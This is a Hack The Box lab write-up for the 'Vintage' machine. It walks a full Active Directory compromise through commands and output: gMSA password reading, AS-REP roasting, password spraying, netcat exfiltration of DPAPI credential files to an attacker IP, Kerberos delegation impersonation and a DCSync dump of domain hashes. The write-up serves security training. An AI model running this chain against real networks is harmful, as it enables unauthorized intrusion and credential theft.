Hackthebox: Vintage

Overview

Vintage is a hard-difficulty machine from Hack The Box dealing initially with compormising a pre-2000 windows machine credentials leading to the abuse of ReadGMSAPassword -> Abuse AddSelf for the SERVICEMANAGERS group -> Abuse GenericAll on SVC_SQL service account by adding the DONT_REQ_PREAUTH flag so we could perfrom AS-REP Roasting -> Crack the password -> Use that password to claim our user flag with c.neri user -> Extract and decrypt DPAPI credentials -> Abuse the privileges of our new user to add SVC_SQL user to DELEGATEDADMINS to finally impersonate L.BIANCHI_ADM user who has DCSync right on the domain !

Reconnaissance

$nmap -A -Pn 10.129.231.205
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-01 09:44 W. Central Africa Standard Time
Nmap scan report for 10.129.231.205
Host is up (0.24s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-01 08:50:26Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49400/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-12-01T08:51:24
|_  start_date: N/A
|_clock-skew: 5m34s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 132.85 seconds

We can see from our nmap scan that we’re dealing with Domain Controller since we have the kerberos 88 port.

BloodHound Enumeration

This this is an assumed breach box, we were provided with domain credentials so we are able to run BloodHound-python on the box to enumerate it:

┌──(kali㉿kali)-[~]
└─$ bloodhound-python -c All -u P.Rosa  -p 'Rosaisbest123' -d vintage.htb -ns 10.129.231.205 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: vintage.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.vintage.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc01.vintage.htb
INFO: Found 16 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: FS01.vintage.htb
INFO: Querying computer: dc01.vintage.htb
WARNING: Could not resolve: FS01.vintage.htb: The resolution lifetime expired after 3.105 seconds: Server Do53:10.129.231.205@53 answered The DNS operation timed out.
INFO: Done in 00M 20S
INFO: Compressing output into 20250421184313_bloodhound.zip

We could also see that there is a FS01.vintage.htb machine that we could add to our /etc/hosts file.

Checking bloodhound, we see that Domain Computers can perform ReadGMSAPassword on GMSA01$ service account, so probably for our initial compromise we’ll need to have access to a domain computer.

Initial Compormise - Pre-Windows 2000 Unauthenticated RID Cycling

We can use [pre2k] to check for existence of pre-windows 2000 computer objects (which are fs01$, gmsa01$ and dc01$):

┌──(kali㉿kali)-[~]
└─$ pre2k unauth -d vintage.htb -dc-ip 10.129.231.205 -save -inputfile users

                                ___    __         
                              /'___`\ /\ \        
 _____   _ __    __          /\_\ /\ \\ \ \/'\    
/\ '__`\/\`'__\/'__`\ _______\/_/// /__\ \ , <    
\ \ \L\ \ \ \//\  __//\______\  // /_\ \\ \ \\`\  
 \ \ ,__/\ \_\\ \____\/______/ /\______/ \ \_\ \_\
  \ \ \/  \/_/ \/____/         \/_____/   \/_/\/_/
   \ \_\                                      v3.1    
    \/_/                                          
                                            @garrfoster
                                            @Tw1sm          

[19:01:03] INFO     Testing started at 2025-04-21 19:01:03                                                                                                                                           
[19:01:03] INFO     Using 10 threads                                                                                                                                                                 
[19:01:03] INFO     VALID CREDENTIALS: vintage.htb\fs01$:fs01                                                                                                                                        
[19:01:03] INFO     Saving ticket in fs01$.ccache                                                                                                                                                    
                                                                                                                                                                                                     
┌──(kali㉿kali)-[~]
└─$ cat users            
GMSA01$
fs01$
dc01$
      

And we got valid credentials for the machine account fs01$ which is using fs01 as the password.

We can now use BloodAD to raad the GMSA Password:

┌──(kali㉿kali)-[~]
└─$ bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.231.205 -k get object 'GMSA01$' --attr msDS-ManagedPassword

distinguishedName: CN=gMSA01,CN=Managed Service Accounts,DC=vintage,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:b3a15bbdfb1c53238d4b50ea2c4d1178
msDS-ManagedPassword.B64ENCODED: cAPhluwn4ijHTUTo7liDUp19VWhIi9/YDwdTpCWVnKNzxHWm2Hl39sN8YUq3hoDfBcLp6S6QcJOnXZ426tWrk0ztluGpZlr3eWU9i6Uwgkaxkvb1ebvy6afUR+mRvtftwY1Vnr5IBKQyLT6ne3BEfEXR5P5iBy2z8brRd3lBHsDrKHNsM+Yd/OOlHS/e1gMiDkEKqZ4dyEakGx5TYviQxGH52ltp1KqT+Ls862fRRlEzwN03oCzkLYg24jvJW/2eK0aXceMgol7J4sFBY0/zAPwEJUg1PZsaqV43xWUrVl79xfcSbyeYKL0e8bKhdxNzdxPlsBcLbFmrdRdlKvE3WQ==

Now checking what GMSA01$ is capable of, we can see his had GenericWrite and AddSelf to SERVICEMANAGERS group:

We can use the GMSA01$ account credentials we just obtained to add our user p.rosa to the group and then get a TGT for her:

┌──(kali㉿kali)-[~/impacket/examples]
└─$ python3 getTGT.py "vintage.htb/GMSA01\$" -hashes :b3a15bbdfb1c53238d4b50ea2c4d1178 -dc-ip dc01.vintage.htb 
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Saving ticket in GMSA01$.ccache
                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/impacket/examples]
└─$ export KRB5CCNAME=GMSA01\$.ccache 
                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/impacket/examples]
└─$ bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.231.205 -k add groupMember "SERVICEMANAGERS" "P.ROSA"      
[+] P.ROSA added to SERVICEMANAGERS
┌──(kali㉿kali)-[~/impacket/examples]
└─$ python3 getTGT.py -dc-ip 10.129.231.205 vintage.htb/P.Rosa:Rosaisbest123
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Saving ticket in P.Rosa.ccache
                                                                                                                                                 
┌──(kali㉿kali)-[~/impacket/examples]
└─$ export KRB5CCNAME=P.Rosa.ccache  

Now checking what the SERVICEMANAGERS group can do, we can see it has GenericAll on SVC_ARK, SVC_LDAP and SVC_SQL service accounts:

What we can do is add the DONT_REQ_PREAUTH to all these service accounts and then perform AS-REP Roasting on them and try to crack their password hashes:

┌──(kali㉿kali)-[~/impacket/examples]
└─$ bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.231.205 -k add uac SVC_ARK -f DONT_REQ_PREAUTH   
[-] ['DONT_REQ_PREAUTH'] property flags added to SVC_ARK's userAccountControl
                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/impacket/examples]
└─$ bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.231.205 -k add uac SVC_SQL -f DONT_REQ_PREAUTH
[-] ['DONT_REQ_PREAUTH'] property flags added to SVC_SQL's userAccountControl
                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/impacket/examples]
└─$ bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.231.205 -k remove uac SVC_SQL -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from SVC_SQL's userAccountControl

(We have to also activate the SVC_SQL account by removing the ACCOUNTDISABLE flag)

Now we can request TGTs for them and get their hashes:

┌──(kali㉿kali)-[~/impacket/examples]
└─$ python3 GetNPUsers.py vintage.htb/SVC_SQL -no-pass                      
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Getting TGT for SVC_SQL
/home/kali/impacket/examples/GetNPUsers.py:163: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
$krb5asrep$23$SVC_SQL@VINTAGE.HTB:3da7aa9a63095aa109036eccf0c53294$5abb73be992f09985dea289dea5a0914a4e9a439a4f4bdaf6f53de6c49ab7a0ea678b7941f3ee05a9f07f1c53a3a6e72a6b7ecf682bbcfcc2bccf3dc618fcfe4d62d812d13c6c8a741edb8da69f7d7a53b39574db334ca7cdb1dace33f73167150552345715702bc051098982728bf70d379fffb9f04998bf71bf5bf1154b54348c52dd389d2a70e67445fed159a1e39616d9ffbc6ecfb32cfeb073b14af2e2ee551da8d3cfc23382d4c18297be61a8b861e4b92011c4b23ecc737d64f48a52e958113ccd05c4e7eb62f9ead71f525d62edd9c43c454b6dd991249b6bf1b1f61c2a9890d80032cab127b
                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/impacket/examples]
└─$ python3 GetNPUsers.py vintage.htb/SVC_ARK -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Getting TGT for SVC_ARK
/home/kali/impacket/examples/GetNPUsers.py:163: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
$krb5asrep$23$SVC_ARK@VINTAGE.HTB:9c3a66ed5bc9c06915d33708e1670f47$4091cb20f2139022f85472d5031b6e588151f560891d0b8bac7f8805ef5af51738a6944861792d09dd8c13bf7781cf5bdf5d2f6fc8344b2749ee776b50292fccaaf3bc042ee190db5dc048ddc63171e2eff61ed6486c7df4554bdab3d6f620e331106b140fac79b12df4c1ce01e240db7fab7d1cb0a04a64f2dd69012bc60b3464b5f763fe832f8aa81c66de4539d1bb18d84d11ba3558a89bcbd8a5f4e2ed88c39baeb3d9d9ae4a2d482cdcb8040fd7d5fdff79581c11a0ca0fd634321ce97a2ef39eadeb2be692849d85d03d963d34ee51812c09aabe4e22a9d66e024996d2c365691a3912ef3b65f7

And now attempt to crack these hashes:

┌──(kali㉿kali)-[~/impacket/examples]
└─$ john  -w=/usr/share/wordlists/rockyou.txt hashes 
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Zer0the0ne       ($krb5asrep$23$SVC_SQL@VINTAGE.HTB)

And we got the password for the SVC_SQL account.
We can now use this password to perform a password spraying attack on the users we got from bloodhound:

┌──(kali㉿kali)-[~/Downloads]
└─$ ./kerbrute_linux_amd64 passwordspray --dc vintage.htb -d vintage.htb users Zer0the0ne

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 04/21/25 - Ronnie Flathers @ropnop

2025/04/21 19:36:16 >  Using KDC(s):
2025/04/21 19:36:16 >   vintage.htb:88

2025/04/21 19:36:16 >  [+] VALID LOGIN:  [email protected]:Zer0the0ne
2025/04/21 19:36:16 >  [+] VALID LOGIN:  [email protected]:Zer0the0ne
2025/04/21 19:36:16 >  Done! Tested 16 logins (2 successes) in 0.510 seconds
                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/Downloads]
└─$ cat users 
GMSA01$
C.NERI
G.VIOLA
L.BIANCHI
L.BIANCHI_ADM
C.NERI_ADM
SVC_ARK
SVC_LDAP
SVC_SQL
KRBTGT
ADMINISTRATOR
GUEST
NT AUTHORITY
P.ROSA
R.VERDI
M.ROSSI

And the password was valid for C.NERI user. Lets now use that user who’s also a member of Remote Management Users to get access to system and our user flag by first requesting a TGT and then connecting with evil-winrm:

┌──(kali㉿kali)-[~]
└─$ getTGT.py -dc-ip 10.129.231.205 vintage.htb/C.Neri:Zer0the0ne
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Saving ticket in C.Neri.ccache
                                                                                                                                                                                                     
┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=C.Neri.ccache              
                                                                                                                                                                                                     
┌──(kali㉿kali)-[~]
└─$ evil-winrm -i dc01.vintage.htb -r vintage.htb                
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\C.Neri\Documents> whoami
vintage\c.neri
*Evil-WinRM* PS C:\Users\C.Neri\Documents> cat ../desktop/user.txt
64deb83e04c3c5bf5f9338823a0aaa96
*Evil-WinRM* PS C:\Users\C.Neri\Documents>

Privilege Escalation to Administrator

Credential Dumping via DPAPI to get c.neri_adm

Now since we’re on the machine, we can download the masterkey and dpapi key to dump credentials.
Let’s first upload nc64.exe to the machine and then download the masterkey and then the dpapi key:

*Evil-WinRM* PS C:\Users\C.Neri\Documents> cmd /c "./nc64.exe 10.10.16.42 9001 < C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b"

*Evil-WinRM* PS C:\Users\C.Neri\Documents> cmd /c "C:\Users\C.Neri\Documents\nc64.exe
10.10.16.42 9001 < C:\Users\C.Neri\appdata\roaming\microsoft\credentials\C4BB96844A5C9DD45D5B6A9859252BA6"

And then on our attacker machine:

nc -lnvp 9001 > master
nc -lnvp 9001 > dec

And now we can decrypt the masterkey using the password:

┌──(kali㉿kali)-[~/Hackthebox/VIntage]
└─$ dpapi.py masterkey -file 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password Zer0the0ne
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
Flags       :        0 (0)
Policy      :        0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a

And finally extract credentials from the dpapi key:

┌──(kali㉿kali)-[~/Hackthebox/VIntage]
└─$ dpapi.py credential -file dec -key 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[CREDENTIAL]
LastWritten : 2024-06-07 15:08:23
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000001 (CRED_TYPE_GENERIC)
Target      : LegacyGeneric:target=admin_acc
Description : 
Unknown     : 
Username    : vintage\c.neri_adm
Unknown     : Uncr4ck4bl3P4ssW0rd0312

This gives us credentials for c.neri_adm.

Privesc to Administrator - RBCD with SPN abuse

Now from bloodhound we can see that c.neri_adm has GenericWrite and AddSelt on DELEGATEDADMINS which itself has l.bianchi_adm as a member:

What we could do now is try to impersonate l.bianchi_adm user. We can do so by first adding svc_sql service account to DELEGATEDADMINS group and then perform the impersonation using it:

┌──(kali㉿kali)-[~/Hackthebox/VIntage]
└─$ bloodyAD --host dc01.vintage.htb --dc-ip 10.129.231.205 -d "VINTAGE.HTB" -u c.neri_adm -p 'Uncr4ck4bl3P4ssW0rd0312' -k add groupMember "DELEGATEDADMINS" "SVC_SQL"
[+] SVC_SQL added to DELEGATEDADMINS

Now add an SPN to SVC_SQL:

*Evil-WinRM* PS C:\Users\C.Neri\Documents> Set-ADUser -Identity svc_sql -Add @{servicePrincipalName="cifs/kujen"}
*Evil-WinRM* PS C:\Users\C.Neri\Documents> Get-ADUser -Identity svc_sql -Properties servicePrincipalName


DistinguishedName    : CN=svc_sql,OU=Pre-Migration,DC=vintage,DC=htb
Enabled              : False
GivenName            :
Name                 : svc_sql
ObjectClass          : user
ObjectGUID           : 3fb41501-6742-4258-bfbe-602c3a8aa543
SamAccountName       : svc_sql
servicePrincipalName : {cifs/kujen}
SID                  : S-1-5-21-4024337825-2033394866-2055507597-1134
Surname              :
UserPrincipalName    :

┌──(kali㉿kali)-[~/Hackthebox/VIntage]
└─$ impacket-getTGT -dc-ip 10.129.231.205 vintage.htb/svc_sql:Zer0the0ne
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in svc_sql.ccache
                                                                                      
┌──(kali㉿kali)-[~/Hackthebox/VIntage]
└─$ export KRB5CCNAME=svc_sql.ccache 
                                                                                      

And now perform the impersonation:

┌──(kali㉿kali)-[~/Hackthebox/VIntage]
└─$ impacket-getST -spn cifs/dc01.vintage.htb -impersonate l.bianchi_adm -k  -dc-ip 10.129.231.205 'vintage.htb/svc_sql:Zer0the0ne'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Impersonating l.bianchi_adm
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/usr/share/doc/python3-impacket/examples/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in l.bianchi_adm@[email protected]

We can also see that l.bianchi_adm has DCSync rights on the domain so we can dump secrets using his ticket:

┌──(kali㉿kali)-[~/Hackthebox/VIntage]
└─$ export KRB5CCNAME=l.bianchi_adm@[email protected] 
                                                                                      
┌──(kali㉿kali)-[~/Hackthebox/VIntage]
└─$ impacket-secretsdump -k dc01.vintage.htb 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xb632ebd8c7df30094b6cea89cdf372be
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e41bb21e027286b2e6fd41de81bce8db:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
VINTAGE\DC01$:plain_password_hex:ca385c025f7b81712d83d60e6c6ac2c6787e877114fe8342bd9b496572c6e1f3d2c82dee411d9bbdb6dc1eb7981bea8a7faa98d2b6efab8b3a90f85d48a3ec66c5f2b4c6d2d4ca747927ab1efd025f66a8e6914917e5d1e6112c7f2a668129ae0303f41f6b0b6c01219c09522da4f5cf9050bed3954973f14a4ff49a12f64d570d6cbd466b81c2ec86c0758213f35cf6db976b25aac295fe3e3953ca30cbe3afc9677d932d95cca63da09ad700abc22a9836ddb44de0be762f12f46eba649b293794f50a946898d1a786dfcac9582bd20e8fd21a9678d1e2d82b7bf3dec2f03bf67ab63d73ec4b34968678a77c3f6106
VINTAGE\DC01$:aad3b435b51404eeaad3b435b51404ee:2dc5282ca43835331648e7e0bd41f2d5:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x329e3f315c1e7294f086908d3d14c990c030305a
dpapi_userkey:0x2bd12147462ab2b6e92adcb202c9d8258c270790
[*] NL$KM 
 0000   7E F4 65 54 4C 71 04 1D  24 FC 9B ED 7B 0D B1 1B   ~.eTLq..$...{...
 0010   F0 E6 0E BF EF 13 78 C1  04 48 9F AE 46 49 39 A5   ......x..H..FI9.
 0020   D6 A9 94 E1 CC 13 FB 7D  29 02 00 C1 F8 CD 61 F3   .......}).....a.
 0030   8C 6D 56 42 1E 8B 3A 92  E1 8E E0 3C 6E 77 04 BC   .mVB..:....<nw..
NL$KM:7ef465544c71041d24fc9bed7b0db11bf0e60ebfef1378c104489fae464939a5d6a994e1cc13fb7d290200c1f8cd61f38c6d56421e8b3a92e18ee03c6e7704bc
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:468c7497513f8243b59980f2240a10de:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:be3d376d906753c7373b15ac460724d8:::
M.Rossi:1111:aad3b435b51404eeaad3b435b51404ee:8e5fc7685b7ae019a516c2515bbd310d:::
R.Verdi:1112:aad3b435b51404eeaad3b435b51404ee:42232fb11274c292ed84dcbcc200db57:::
L.Bianchi:1113:aad3b435b51404eeaad3b435b51404ee:de9f0e05b3eaa440b2842b8fe3449545:::
G.Viola:1114:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri:1115:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
P.Rosa:1116:aad3b435b51404eeaad3b435b51404ee:8c241d5fe65f801b408c96776b38fba2:::
svc_sql:1134:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
svc_ldap:1135:aad3b435b51404eeaad3b435b51404ee:458fd9b330df2eff17c42198627169aa:::
svc_ark:1136:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri_adm:1140:aad3b435b51404eeaad3b435b51404ee:91c4418311c6e34bd2e9a3bda5e96594:::
L.Bianchi_adm:1141:aad3b435b51404eeaad3b435b51404ee:cbec9c4d00eed43294047017fae25d62:::
DC01$:1002:aad3b435b51404eeaad3b435b51404ee:2dc5282ca43835331648e7e0bd41f2d5:::
gMSA01$:1107:aad3b435b51404eeaad3b435b51404ee:a317f224b45046c1446372c4dc06ae53:::
FS01$:1108:aad3b435b51404eeaad3b435b51404ee:44a59c02ec44a90366ad1d0f8a781274:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:5f22c4cf44bc5277d90b8e281b9ba3735636bd95a72f3870ae3de93513ce63c5
Administrator:aes128-cts-hmac-sha1-96:c119630313138df8cd2e98b5e2d018f7
Administrator:des-cbc-md5:c4d5072368c27fba
krbtgt:aes256-cts-hmac-sha1-96:8d969dafdd00d594adfc782f13ababebbada96751ec4096bce85e122912ce1f0
krbtgt:aes128-cts-hmac-sha1-96:3c7375304a46526c00b9a7c341699bc0
krbtgt:des-cbc-md5:e923e308752658df
M.Rossi:aes256-cts-hmac-sha1-96:14d4ea3f6cd908d23889e816cd8afa85aa6f398091aa1ab0d5cd1710e48637e6
M.Rossi:aes128-cts-hmac-sha1-96:3f974cd6254cb7808040db9e57f7e8b4
M.Rossi:des-cbc-md5:7f2c7c982cd64361
R.Verdi:aes256-cts-hmac-sha1-96:c3e84a0d7b3234160e092f168ae2a19366465d0a4eab1e38065e79b99582ea31
R.Verdi:aes128-cts-hmac-sha1-96:d146fa335a9a7d2199f0dd969c0603fb
R.Verdi:des-cbc-md5:34464a58618f8938
L.Bianchi:aes256-cts-hmac-sha1-96:abcbbd86203a64f177288ed73737db05718cead35edebd26740147bd73e9cfed
L.Bianchi:aes128-cts-hmac-sha1-96:92067d46b54cdb11b4e9a7e650beb122
L.Bianchi:des-cbc-md5:01f2d667a19bce25
G.Viola:aes256-cts-hmac-sha1-96:f3b3398a6cae16ec640018a13a1e70fc38929cfe4f930e03b1c6f1081901844a
G.Viola:aes128-cts-hmac-sha1-96:367a8af99390ebd9f05067ea4da6a73b
G.Viola:des-cbc-md5:7f19b9cde5dce367
C.Neri:aes256-cts-hmac-sha1-96:c8b4d30ca7a9541bdbeeba0079f3a9383b127c8abf938de10d33d3d7c3b0fd06
C.Neri:aes128-cts-hmac-sha1-96:0f922f4956476de10f59561106aba118
C.Neri:des-cbc-md5:9da708a462b9732f
P.Rosa:aes256-cts-hmac-sha1-96:f9c16db419c9d4cb6ec6242484a522f55fc891d2ff943fc70c156a1fab1ebdb1
P.Rosa:aes128-cts-hmac-sha1-96:1cdedaa6c2d42fe2771f8f3f1a1e250a
P.Rosa:des-cbc-md5:a423fe64579dae73
svc_sql:aes256-cts-hmac-sha1-96:3bc255d2549199bbed7d8e670f63ee395cf3429b8080e8067eeea0b6fc9941ae
svc_sql:aes128-cts-hmac-sha1-96:bf4c77d9591294b218b8280c7235c684
svc_sql:des-cbc-md5:2ff4022a68a7834a
svc_ldap:aes256-cts-hmac-sha1-96:d5cb431d39efdda93b6dbcf9ce2dfeffb27bd15d60ebf0d21cd55daac4a374f2
svc_ldap:aes128-cts-hmac-sha1-96:cfc747dd455186dba6a67a2a340236ad
svc_ldap:des-cbc-md5:e3c48675a4671c04
svc_ark:aes256-cts-hmac-sha1-96:820c3471b64d94598ca48223f4a2ebc2491c0842a84fe964a07e4ee29f63d181
svc_ark:aes128-cts-hmac-sha1-96:55aec332255b6da8c1344357457ee717
svc_ark:des-cbc-md5:6e2c9b15bcec6e25
C.Neri_adm:aes256-cts-hmac-sha1-96:96072929a1b054f5616e3e0d0edb6abf426b4a471cce18809b65559598d722ff
C.Neri_adm:aes128-cts-hmac-sha1-96:ed3b9d69e24d84af130bdc133e517af0
C.Neri_adm:des-cbc-md5:5d6e9dd675042fa7
L.Bianchi_adm:aes256-cts-hmac-sha1-96:c67109aaa7f7ae3f0f157a411a5df035dddd9dc0ec723f32698c23ee27d35a91
L.Bianchi_adm:aes128-cts-hmac-sha1-96:a10f5e2bda76767b415194940562cd2e
L.Bianchi_adm:des-cbc-md5:68465b6edce0f101
DC01$:aes256-cts-hmac-sha1-96:f8ceb2e0ea58bf929e6473df75802ec8efcca13135edb999fcad20430dc06d4b
DC01$:aes128-cts-hmac-sha1-96:a8f037cb02f93e9b779a84441be1606a
DC01$:des-cbc-md5:c4f15ef8c4f43134
gMSA01$:aes256-cts-hmac-sha1-96:dbfcdca25386b9c81bae0459076539bb3886110b180e403000965e9c7fd9a8eb
gMSA01$:aes128-cts-hmac-sha1-96:d7482d566993f8c15211ad35367f2738
gMSA01$:des-cbc-md5:34fb4076ba6e49cb
FS01$:aes256-cts-hmac-sha1-96:d57d94936002c8725eab5488773cf2bae32328e1ba7ffcfa15b81d4efab4bb02
FS01$:aes128-cts-hmac-sha1-96:ddf2a2dcc7a6080ea3aafbdf277f4958
FS01$:des-cbc-md5:dafb3738389e205b
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

And we can finally claim our root flag using wmiexec:

┌──(kali㉿kali)-[~/Hackthebox/VIntage]
└─$ klist
Ticket cache: FILE:l.bianchi_adm@[email protected]
Default principal: [email protected]

Valid starting       Expires              Service principal
12/02/2024 11:49:13  12/02/2024 21:48:45  cifs/[email protected]
        renew until 12/03/2024 11:48:16
                                                                                      
┌──(kali㉿kali)-[~/Hackthebox/VIntage]
└─$ impacket-wmiexec -k -no-pass VINTAGE.HTB/[email protected]
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type C:\Users\Administrator\Desktop\root.txt
32731b6a92aabfcdb4dd699efb4260c0

That was it for Vintage, hope you learned something new!
-0xkujen